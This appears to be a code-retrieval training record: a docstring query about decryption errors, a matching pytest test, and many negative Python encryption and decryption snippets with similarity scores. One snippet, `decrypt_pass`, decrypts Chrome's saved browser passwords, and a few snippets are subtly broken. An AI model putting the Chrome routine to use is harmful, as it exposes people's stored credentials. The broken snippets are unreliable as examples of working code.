[ "0.7515797", "0.72070503", "0.7080225", "0.70087695", "0.68919706", "0.6883082", "0.6702499", "0.6700832", "0.6643625", "0.6547494", "0.65426725", "0.65246123", "0.65195185", "0.6513772", "0.6512258", "0.6473068", "0.645004", "0.644082", "0.6412383", "0.63955086", "0.6384664", "0.63554555", "0.6319811", "0.63076264", "0.63009685", "0.6298364", "0.62982076", "0.62950504", "0.62659585", "0.6216549", "0.62075603", "0.6204017", "0.6204017", "0.619547", "0.6195197", "0.61891216", "0.6153994", "0.6153994", "0.61403716", "0.61374086", "0.6135529", "0.6129432", "0.6101927", "0.60892904", "0.60845447", "0.6083324", "0.608028", "0.608028", "0.60746217", "0.6059485", "0.60513467", "0.6048026", "0.60402584", "0.60264623", "0.60148644", "0.60130936", "0.6011288", "0.60023165", "0.5999862", "0.59813946", "0.5969326", "0.59672475", "0.5958602", "0.5949737", "0.5948432", "0.5947733", "0.59376884", "0.59312946", "0.59253365", "0.5925112", "0.591778", "0.5916524", "0.5914874", "0.5910519", "0.5903772", "0.5896354", "0.58923435", "0.58869636", "0.5885336", "0.58850175", "0.5868816", "0.58678573", "0.5865796", "0.58655995", "0.58498514", "0.58484256", "0.5846585", "0.5846539", "0.5845014", "0.58350104", "0.58066446", "0.5789011", "0.57879627", "0.5786208", "0.57860845", "0.5782853", "0.5779817", "0.5776681", "0.57737494", "0.57665503" ]
0.70483595
3
It raises an error when trying to decrypt a nonencrypted value.
def test_decrypt_format(self):
    with pytest.raises(EncryptionError):
        decrypt('message')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def test_incorrect_decrypt_message(cipher):\n with pytest.raises(AssertionError):\n decrypted = cipher.decrypt('U6DQfhE17od2Qe4TPZFJHn3LOMkpPDqip77e4b5uv7s=')\n assert decrypted == 'Wrong string'", "def _decrypt(self, value, **options):\n\n raise CoreNotImplementedError()", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def test_decryption_private_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(given))", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def test_decrypt_encrypted(self):\n encrypted = encrypt('message')\n decrypted = decrypt(encrypted)\n\n assert decrypted == 'message'", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def decrypt(self, data):", "def decrypt(self, value):\n return self._execute(value, task='decrypt')", "def decrypt_message(encrypted_message):", "def _disabled_decrypt(self, *args, **kwargs):\n raise NotImplementedError('\"decrypt\" is not supported by the \"{}\" algorithm'.format(self.java_name))", "def Decrypt(self, data):\n\n data = base64.b64decode(data)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n solved = \"\"\n try:\n solved = es.decrypt(data)\n except ValueError:\n stdout.write(\"Error, corrupted file.\\n\\n\")\n return \"%errorpass:1234123412341234%\"\n\n return solved", "def decrypt(self, encrypted_token: bytes) -> bytes:\n return None", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def test_decrypt_encoding(self):\n encrypted = encrypt('méssåge')\n decrypted = decrypt(encrypted)\n\n assert decrypted == 'méssåge'", "def test_real_world_malware(self):\n key = bytes.fromhex('0394d550fb286dda')\n data = bytes.fromhex('6bdb2c294e7e031c38e4adecaa8dc755')\n unit = self.load(key, raw=True)\n self.assertEqual(unit.decrypt(data).hex(), '4c5a495001b30026968e700017f7ec05')", "def test_kms_decrypt_fails_without_b64_secret(self):\n with self.assertRaises(SystemExit):\n ef_utils.kms_decrypt(self.mock_kms, self.secret)", "def test_decoding_non_str_fails(self):\n self.assertRaises(DecodingError, base62.to_decimal, sys.maxsize)", "def decrypt(self, key, value):\n key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]\n iv = value[:16]\n crypted = value[16:]\n cipher = AES.new(key,AES.MODE_CBC,iv)\n return self.pkcs5_unpad(cipher.decrypt(crypted))", "def decryptor(byte_string: bytes, IV: bytes, key: bytes) -> bool:\n decrypted_string = AES_CBC_decrypt(byte_string, IV, key)\n print(len(decrypted_string), decrypted_string)\n if not check_ascii_compliance(decrypted_string):\n raise Exception(decrypted_string)", "def testKeyMismatch(self):\n encrypted_data = self.encrypt_wrapper.read(1024 * 1024 
* 100)\n\n wrong_key = crypto.RSAPrivateKey().GenerateKey()\n decrypt_wrapper = uploads.DecryptStream(\n readers_private_key=self.readers_private_key,\n writers_public_key=wrong_key.GetPublicKey(),\n outfd=self.outfd)\n\n # We should know after very few bytes that the key is wrong. The\n # first encrypted chunk is the serialized signature which is 518\n # bytes in the test. Adding crypto headers gives a chunk size of\n # 570. After 600 bytes we should definitely bail out.\n with self.assertRaises(crypto.VerificationError):\n decrypt_wrapper.write(encrypted_data[:600])", "def decrypt(encryption_value):\n Common.logger.info(\"Decryption job started started\")\n key = Common.get_config_value(\"jenkins_key\")\n fkey = Fernet(key.encode())\n decrypt_value = fkey.decrypt(encryption_value.encode())\n return decrypt_value", "def decrypt_data(self, encrypted_data):\n raise NotImplementedError", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def heat_decrypt(value, encryption_key=None):\n encryption_key = get_valid_encryption_key(encryption_key)\n auth = base64.b64decode(value)\n iv = auth[:AES.block_size]\n cipher = AES.new(encryption_key, AES.MODE_CFB, iv)\n res = cipher.decrypt(auth[AES.block_size:])\n return res", "def decrypt(cipherBackup: str, password: str) -> str:\n\n try:\n return comp.desencriptar(cipherBackup, password)\n\n except:\n return '1'", "def decrypt(self, full_encrypted_value, **options):\n\n try:\n self._validate_format(full_encrypted_value, **options)\n encrypted_part = self._get_encrypted_part(self._prepare_input(full_encrypted_value),\n **options)\n\n return self._decrypt(encrypted_part, **options)\n except Exception as error:\n raise DecryptionError(error) from error", "def test_sealedbox_enc_dec(self):\n # Encrypt with pk\n encrypted_data = nacl.sealedbox_encrypt(data=self.unencrypted_data, pk=self.pk)\n\n # Decrypt with sk\n decrypted_data = nacl.sealedbox_decrypt(data=encrypted_data, sk=self.sk)\n\n self.assertEqual(self.unencrypted_data, decrypted_data)", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def test_secretbox_enc_dec(self):\n # Encrypt with sk\n encrypted_data = nacl.secretbox_encrypt(data=self.unencrypted_data, sk=self.sk)\n\n # Decrypt with sk\n decrypted_data = nacl.secretbox_decrypt(data=encrypted_data, sk=self.sk)\n\n self.assertEqual(self.unencrypted_data, decrypted_data)", "def test_encryption_with_data_to_decrypt_as_str(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n encryptor.set_private_key(self.pem_private_key)\n encryptor.set_public_key(self.pem_public_key)\n\n actual = encryptor.encrypt_data(given)\n\n self.assertNotEqual(given, actual)\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(actual.hex()))", "def Decrypt(key, value):\n key = key.zfill(32)[:32]\n aes = AES.new(key, AES.MODE_ECB)\n encrypted = base64.b64decode(value)\n decrypted = aes.decrypt(encrypted)\n return RemovePadding(decrypted)", "def provider_decrypt(self, uid):\n return self.context.get(\"/ckks/provider/decrypt/%s\" % uid, 
None,\n \"CKKS:: failed decrypting data for uid: %s\" % uid\n )", "def _decrypt(self, key, value):\n payload = EncryptedPayload.from_json(value)\n if not payload:\n return value\n\n decrypted = self._kms_crypto.decrypt_payload(payload)\n if not decrypted:\n return value\n\n key_prefix = '%s=' % key\n if not decrypted.startswith(key_prefix):\n return value\n\n return decrypted[len(key_prefix):]", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def decrypt_string(self, value) -> str:\n\n supported_decrypter = self.find_supported_decrypter(value)\n if not (supported_decrypter):\n return value\n\n decrypted_string = supported_decrypter.decrypt_secret_from_aws(value)\n\n # Check if the payload is serialized JSON\n try:\n result = json.loads(decrypted_string)\n except json.decoder.JSONDecodeError:\n result = decrypted_string\n return result", "def test_decryption(d, c):\n\n#\td = int(raw_input(\"\\nEnter d from public key\\n\"))\n#\tc = int(raw_input(\"\\nEnter c from public key\\n\"))\n\n x = int(raw_input(\"\\nEnter number to decrypt\\n\"))\n decode(endecrypt(x, d, c))", "def decrypt(data, key):\n data = six.ensure_binary(data)\n try:\n data = privy.peek(hidden=data, password=key)\n except ValueError:\n error = \"Unable to decrypt {cnt} bytes of data using key {k}, invalid key!\"\n error = error.format(cnt=len(data), k=key)\n raise exceptions.ModuleError(error)\n return six.ensure_text(data)", "def decrypt(self, encrypted: str) -> str: # type: ignore\n passphrase = self.passphrase\n encrypted = base64.b64decode(encrypted) # type: ignore\n assert encrypted[0:8] == b\"Salted__\"\n salt = encrypted[8:16]\n key_iv = self.bytes_to_key(passphrase.encode(), salt, 32 + 16)\n key = key_iv[:32]\n iv = key_iv[32:]\n aes = AES.new(key, AES.MODE_CBC, iv)\n try:\n return self.unpad(aes.decrypt(encrypted[16:])).decode() # type: ignore\n except UnicodeDecodeError:\n raise ValueError(\"Wrong passphrase\")", "def decode(self, crypto):", "def _decrypt(data):\n cipher = AES.new(bytes(_AES_KEY), AES.MODE_CBC, bytes(_AES_IV))\n return cipher.decrypt(data)", "def test_enc_dec(self):\n # Encrypt with pk\n encrypted_data = nacl.enc(data=self.unencrypted_data, pk=self.pk)\n\n # Decrypt with sk\n decrypted_data = nacl.dec(data=encrypted_data, sk=self.sk)\n self.assertEqual(self.unencrypted_data, decrypted_data)", "def test_py2_transaction_exception_message_bytes_english():\n try:\n raise ValueError(BYTES_ENGLISH)\n except ValueError:\n notice_error()", "def decrypt(self, msg):\n if self.security_type is not None and self.security_type != 0:\n res, used, _ = gss.unwrap(self.ctx, msg)\n isconf = self.security_type == gss.RequirementFlag.confidentiality\n if (not used and isconf):\n raise GSSClientError('User requested encryption, '\n 'but the server sent an unencrypted '\n 'message!')\n return res.decode('utf-8')\n else:\n return msg.decode('utf-8')", "def decrypt_string(self, encrypted_string):\n return self.fernet_instance.decrypt(encrypted_string.encode('utf-8')).decode('utf-8')", "def _decrypt_encrypted_data(encryption_algorithm_info, encrypted_content, password):\n\n decrypt_func = crypto_funcs[encryption_algorithm_info.encryption_cipher]\n\n # Modern, PKCS#5 PBES2-based encryption\n if 
encryption_algorithm_info.kdf == 'pbkdf2':\n\n if encryption_algorithm_info.encryption_cipher == 'rc5':\n raise ValueError(pretty_message(\n '''\n PBES2 encryption scheme utilizing RC5 encryption is not supported\n '''\n ))\n\n enc_key = pbkdf2(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length\n )\n enc_iv = encryption_algorithm_info.encryption_iv\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pbkdf1':\n derived_output = pbkdf1(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length + 8\n )\n enc_key = derived_output[0:8]\n enc_iv = derived_output[8:16]\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pkcs12_kdf':\n enc_key = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length,\n 1 # ID 1 is for generating a key\n )\n\n # Since RC4 is a stream cipher, we don't use an IV\n if encryption_algorithm_info.encryption_cipher == 'rc4':\n plaintext = decrypt_func(enc_key, encrypted_content)\n\n else:\n enc_iv = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.encryption_block_size,\n 2 # ID 2 is for generating an IV\n )\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n return plaintext", "def decrypt(s):\n if s is None:\n return None\n else:\n # try:\n enc_value = ast.literal_eval(s)\n private_key = serialization.load_pem_private_key(\n pkey.encode('utf-8'),\n password=None,\n backend=default_backend()\n )\n\n dec = private_key.decrypt(\n enc_value,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n return dec.decode()", "def decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def doDecode(self):\n raise CipherError(\"override this funct and return the decoded msg\")", "def decrypt(self, password):\r\n\r\n key = self.config.get_string(\"gox\", \"secret_key\")\r\n sec = self.config.get_string(\"gox\", \"secret_secret\")\r\n if sec == \"\" or key == \"\":\r\n return self.S_NO_SECRET\r\n\r\n # pylint: disable=E1101\r\n hashed_pass = hashlib.sha512(password.encode(\"utf-8\")).digest()\r\n crypt_key = hashed_pass[:32]\r\n crypt_ini = hashed_pass[-16:]\r\n aes = AES.new(crypt_key, AES.MODE_OFB, crypt_ini)\r\n try:\r\n encrypted_secret = base64.b64decode(sec.strip().encode(\"ascii\"))\r\n self.secret = aes.decrypt(encrypted_secret).strip()\r\n self.key = key.strip()\r\n except ValueError:\r\n return self.S_FAIL\r\n\r\n # now test if we now have something plausible\r\n try:\r\n print(\"testing secret...\")\r\n # is it plain ascii? (if not this will raise exception)\r\n dummy = self.secret.decode(\"ascii\")\r\n # can it be decoded? 
correct size afterwards?\r\n if len(base64.b64decode(self.secret)) != 64:\r\n raise Exception(\"decrypted secret has wrong size\")\r\n\r\n print(\"testing key...\")\r\n # key must be only hex digits and have the right size\r\n hex_key = self.key.replace(\"-\", \"\").encode(\"ascii\")\r\n if len(binascii.unhexlify(hex_key)) != 16:\r\n raise Exception(\"key has wrong size\")\r\n\r\n print(\"ok :-)\")\r\n return self.S_OK\r\n\r\n except Exception as exc:\r\n # this key and secret do not work :-(\r\n self.secret = \"\"\r\n self.key = \"\"\r\n print(\"### Error occurred while testing the decrypted secret:\")\r\n print(\" '%s'\" % exc)\r\n print(\" This does not seem to be a valid MtGox API secret\")\r\n return self.S_FAIL", "def decrypt(code):\n f = Fernet(settings.SECRET_KEY)\n return f.decrypt(code).decode('ascii')", "def test_kms_decrypt_fails_client_error(self):\n self.mock_kms.decrypt.side_effect = self.client_error\n with self.assertRaises(SystemExit):\n ef_utils.kms_decrypt(self.mock_kms, self.secret)", "def raw_decrypt(self, ciphertext):\n if not isinstance(ciphertext, int) and not isinstance(ciphertext, type(mpz(1))) and not isinstance(scalar, numpy.int64):\n raise TypeError('Expected ciphertext to be an int, not: %s' %\n type(ciphertext))\n\n decrypt_to_p = self.l_function(powmod(ciphertext, self.p-1, self.psquare), self.p) * self.hp % self.p\n decrypt_to_q = self.l_function(powmod(ciphertext, self.q-1, self.qsquare), self.q) * self.hq % self.q\n value = self.crt(decrypt_to_p, decrypt_to_q)\n if value < self.n/3:\n return value\n else:\n return value - self.n", "def decrypt_message(encrypted_message):\r\n\r\n # conversion to bytes\r\n encrypted_message = bytes(encrypted_message, \"ascii\")\r\n\r\n # loading key\r\n key = load_key()\r\n\r\n # creating a fernet object\r\n f = Fernet(key)\r\n\r\n # decrypting the messsage\r\n decrypted_message = f.decrypt(encrypted_message)\r\n\r\n return decrypted_message.decode()", "def Decrypt(self, ciphertext):\n if not isinstance(ciphertext, int) and not isinstance(ciphertext, long):\n raise ValueError('Expected int or long type ciphertext but got: %s' %\n type(ciphertext))\n u = ModExp(ciphertext, self.__lambda, self.nsquare)\n l_of_u = (u - 1) // self.n\n return (l_of_u * self.__mu) % self.n", "def decrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.decrypt(message)", "def _decode_encrypted_part(self, value):\n\n return encoding_utils.base64_to_bytes(value)", "def test_fail():\n enig = Enigma()\n str1 = \"Hellow\"\n str2 = \"Potato\"\n en1 = enig.encode(str1)\n en2 = enig.encode(str2)\n de1 = enig.decode(en1)\n de2 = enig.decode(en2)\n\n assert_not_equal(str1, de1)\n assert_not_equal(str2, de2)", "def decrypt(self, input, iv) :\n pass", "def decrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n decrypted = aes.decrypt(text)\r\n return decrypted", "def test_plaintext_and_anoncrypt_raises_error(alice):\n with pytest.raises(ValueError):\n alice.pack({\"test\": \"test\"}, plaintext=True, anoncrypt=True)", "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def AES_decrypt(ciphertext: bytes) -> Text:\n text = b64decode(ciphertext)\n cipher = AES.new(secret_key, mode, IV)\n return Padding.unpad(cipher.decrypt(text), bs).decode('utf-8')", "def decrypt_pk(priv_key, ciphertext):\n try:\n plaintext = priv_key.decrypt(\n b64decode(ciphertext),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=CryptoHash()),\n algorithm=CryptoHash(),\n label=None\n )\n )\n except UnsupportedAlgorithm as e:\n # a 
failure to dencrypt someone else's data is not typically a fatal\n # error, but in this particular case, the most likely cause of this\n # error is an old cryptography library\n logging.error(\"Fatal error: encryption hash {} unsupported, try upgrading to cryptography >= 1.4. Exception: {}\".format(\n CryptoHash, e))\n # re-raise the exception for the caller to handle\n raise e\n return plaintext", "def test_kms_re_encrypt_fails_without_b64_secret(self):\n with self.assertRaises(SystemExit):\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, self.secret)", "def decrypt(value, profile=DEFAULT_PROFILE, store=DEFAULT_STORE,\n passphrase=None, key=None):\n key = key or _create_dec_key(profile, store, passphrase=passphrase)\n if key:\n return _decrypt_value(key, value)\n else:\n # No decryption support\n return value", "def test_py2_transaction_exception_message_bytes_non_english():\n try:\n raise ValueError(BYTES_UTF8_ENCODED)\n except ValueError:\n notice_error()", "def test_encryption_public_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.encrypt_data(given))", "def decrypt(self, cipherText, additionalData=''):\n # warning only valid in the random oracle\n mac_key = sha2(b'Poor Mans Key Extractor'+self._key).digest()\n mac = MessageAuthenticator(mac_key)\n if not mac.verify(cipherText, additionalData=additionalData):\n raise ValueError(\"Invalid mac. Your data was tampered with or your key is wrong\")\n else:\n return super(AuthenticatedCryptoAbstraction, self).decrypt(cipherText['msg'])", "def test_endecrypt():\n\n e, d, c = keygen()\n\n test_encryption(e, c)\n test_decryption(d, c)\n key_cracker(e, c)", "def decrypt_message(self, encrypted_message):\n f = Fernet(bytes(self.key))\n decrypted_message = f.decrypt(encrypted_message)\n return decrypted_message", "def test_encrypt_decrypt(self):\n reference = get_random_test_tensor()\n encrypted_tensor = SharedTensor(reference)\n self._check(encrypted_tensor, reference, 'en/decryption failed')", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def decrypt(ciphertext, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\n\tif not isPython2():\n\t\tif isString(ciphertext):\n\t\t\tciphertext = ciphertext.encode(\"latin-1\")\n\t\tif isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\t\t\n\tiv = ciphertext[:AES.block_size]\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tplaintext = cipher.decrypt(ciphertext[AES.block_size:])\n\treturn plaintext", "def decrypt(ciphertext):\n # AES decrypt\n iv = ciphertext[:16]\n ciphertext = ciphertext[16:]\n aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(aes.decrypt(ciphertext))", "def test_encrypt_encoding(self):\n encrypted = encrypt('message')\n\n assert encrypted\n assert encrypted != 'message'\n assert type(encrypted) == str", "def unsleeve(self, encrypted_token: str) -> Tuple[bytes, int, int]:\n b64_decoded_token = base64.b64decode(encrypted_token)\n decrypted_token = self.decrypt(b64_decoded_token)\n\n payload, timestamp_ms, crc = tuple(\n decrypted_token.split(self.sep_token))\n\n return payload, int.from_bytes(timestamp_ms, 'big'), int.from_bytes(crc, 'big')", "def test_py3_transaction_exception_message_bytes_non_english():\n try:\n raise ValueError(BYTES_UTF8_ENCODED)\n except 
ValueError:\n notice_error()", "def from_db_value(self, value, expression, connection):\n return decrypt(value)", "def test_py2_transaction_exception_message_bytes_implicit_encoding_non_english():\n try:\n\n # Bytes literal with non-ascii compatible characters only allowed in\n # python 2\n\n raise ValueError('I💜🐍')\n except ValueError:\n notice_error()", "def decrypt(priv_key, ciphertext):\n pk_encrypted_secret_key = ciphertext['pk_encrypted_secret_key']\n sym_encrypted_data = ciphertext['sym_encrypted_data']\n # TODO: secure delete\n secret_key = decrypt_pk(priv_key, pk_encrypted_secret_key)\n encoded_string = decrypt_symmetric(secret_key, sym_encrypted_data)\n return decode_data(encoded_string)", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def decryptAESBlock(key, ct):\n\tif len(ct) != 16 and len(ct) != 32:\n\t\traise Exception(\"Ciphertext is not length 16 or 32\")\n\tcipher = AES.new(key, AES.MODE_ECB)\n\treturn cipher.decrypt(ct)", "def decrypt(text: str, key: str = None):\n if not text.isdecimal():\n raise ValueError(\"Encrypted text must contain only numbers.\")\n tmpres = []\n lkey = []\n if key is not None:\n lkey = list(key.encode(\"utf-8\"))\n i = 0\n counter = 0\n while i < len(text):\n l = int(text[i])\n tmp = text[i + 1:i + l + 1]\n i += l + 1\n if not tmp:\n break\n if lkey:\n c = int(tmp) - lkey[counter % len(lkey)]\n else:\n pm = 1 if tmp[0] == \"0\" else -1\n ri = int(tmp[1]) * pm\n c = int(tmp[2:]) - ri\n tmpres.append(c)\n counter += 1\n return bytes(tmpres).decode(\"utf8\")", "def _decrypt(self, msg):\r\n # they must be real crypto experts at pubnub.com\r\n # two lines of code and two capital mistakes :-(\r\n # pylint: disable=E1101\r\n key = hashlib.sha256(self.cipher).hexdigest()[0:32]\r\n aes = AES.new(key, AES.MODE_CBC, \"0123456789012345\")\r\n decrypted = aes.decrypt(base64.decodestring(msg))\r\n return json.loads(decrypted[0:-ord(decrypted[-1])])", "def decrypt(self, input, key, iv) :\n pass", "def decrypt_message(self):\r\n\r\n\t\t#Will not let user input useless messages that cannot be decrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to decrypt. 
--> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Your decrypted message is\")\r\n\t\tprint(self.my_code + \"|\")", "def decrypt_data ( aes_key, data ) :\n decoded_data = decode_data( data )\n salt = decoded_data[ 0 : Crypto.Cipher.AES.block_size ]\n encrypted_data = decoded_data[ Crypto.Cipher.AES.block_size : ]\n cipher = Crypto.Cipher.AES.new( aes_key, Crypto.Cipher.AES.MODE_CFB, salt )\n decrypted_data = cipher.decrypt( encrypted_data )\n\n return decrypted_data", "def _post_decrypt_checks(self, aad, plaintext, protected_message, request_id):", "def decrypt_pass(self, cont):\r\n try:\r\n iv = cont[3:15]\r\n data = cont[15:]\r\n ciph = AES.new(self.chrome_key(), AES.MODE_GCM, iv)\r\n decrypted = ciph.decrypt(data)\r\n decrypted = decrypted[:-16].decode()\r\n return decrypted\r\n except:\r\n decrypted = win32crypt.CryptUnprotectData(buff, None, None, None, 0)\r\n return decrypted[1]", "def test_illgal_character(self):\n self.assertRaises(DecodingError, base62.to_decimal, '@@@@')", "def decrypt_kms_data(encrypted_data):\n if not AWS_REGION:\n return\n\n kms = boto3.client('kms', region_name=AWS_REGION)\n\n decrypted = kms.decrypt(CiphertextBlob=encrypted_data)\n\n if decrypted.get('KeyId'):\n # Decryption succeed\n decrypted_value = decrypted.get('Plaintext', '')\n if isinstance(decrypted_value, bytes):\n decrypted_value = decrypted_value.decode('utf-8')\n return decrypted_value", "def decrypt(self, key, data, mode, padding):\n # pylint: disable=unused-argument,no-self-use\n if hasattr(key, \"public_bytes\"):\n raise NotImplementedError('\"decrypt\" is not supported by public keys')\n try:\n return key.decrypt(data, padding.build())\n except Exception:\n error_message = \"Decryption failed\"\n _LOGGER.exception(error_message)\n raise DecryptionError(error_message)", "def decrypt(self, cypher):\n\n if self.crypt_private == \"\":\n raise ValueError(\"Error decrypting: No private encryption key found for {}\".format(self))\n\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def decrypt(key, input_token):\n try:\n target = decrypt_string(input_token.strip(), key=key)\n except InvalidToken:\n click.echo('Error: Token is invalid')\n sys.exit(1)\n\n click.echo('The decrypted result is: ', nl=False)\n click.echo(click.style(target, fg='blue'))", "def decrypt(self,e):\n if self._f is None or self._g is None:\n raise Exception(\"Private key not found.\")\n\n if e._N <= self._P.get_N():\n\n if not self._fp:\n self._fp = invert_in_p(self._f, self._P.get_N())\n if not self._fq:\n self._fq = invert_in2tor(self._f, self._P.get_N(), int(lg(self._P.get_q())))\n\n assert(self._h == self._fq * self._g)\n\n a = (self._f * e) % self._P.get_q()\n b = (self._fp * a) % self._P.get_p()\n\n return b # decrypted message\n else:\n raise Exception(\"e is too large, must be equal or under size %d\" % self._P.get_N())" ]
[ "0.7508658", "0.73156184", "0.7232054", "0.6764023", "0.66845644", "0.657834", "0.6562093", "0.65003294", "0.6460941", "0.6459456", "0.6367024", "0.63215554", "0.6274202", "0.62535083", "0.62495065", "0.62276834", "0.6201334", "0.6190526", "0.618059", "0.61519164", "0.61452615", "0.6136156", "0.6099021", "0.606818", "0.6026457", "0.5960535", "0.59432477", "0.59120756", "0.5902871", "0.5895447", "0.58910066", "0.58910066", "0.58754396", "0.58694", "0.5862942", "0.58516747", "0.58449835", "0.5840804", "0.5818914", "0.5815402", "0.5790657", "0.578842", "0.578645", "0.5770115", "0.5765773", "0.5752916", "0.5752096", "0.5733301", "0.5727293", "0.5725853", "0.57141256", "0.5695599", "0.5678035", "0.566142", "0.5659336", "0.5656544", "0.56561154", "0.5624676", "0.56203055", "0.56192464", "0.56131375", "0.5610483", "0.5592887", "0.55866677", "0.55812216", "0.5574962", "0.5559074", "0.55563605", "0.55455106", "0.55428696", "0.5540496", "0.5539701", "0.5536342", "0.55362034", "0.5523473", "0.5520655", "0.55098647", "0.5503502", "0.54924923", "0.5479769", "0.5477788", "0.54552937", "0.54429156", "0.54370356", "0.54088354", "0.5404223", "0.54041445", "0.5396272", "0.53840226", "0.538369", "0.5382598", "0.5381381", "0.53806293", "0.5378996", "0.53755736", "0.5373022", "0.5372942", "0.5364954", "0.5363529", "0.536014" ]
0.76258427
0
It accepts a custom decryption key.
def test_decrypt_key(self): key = b'0' * 32 encrypted = encrypt('message', key=key) assert decrypt(encrypted, key=key) == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
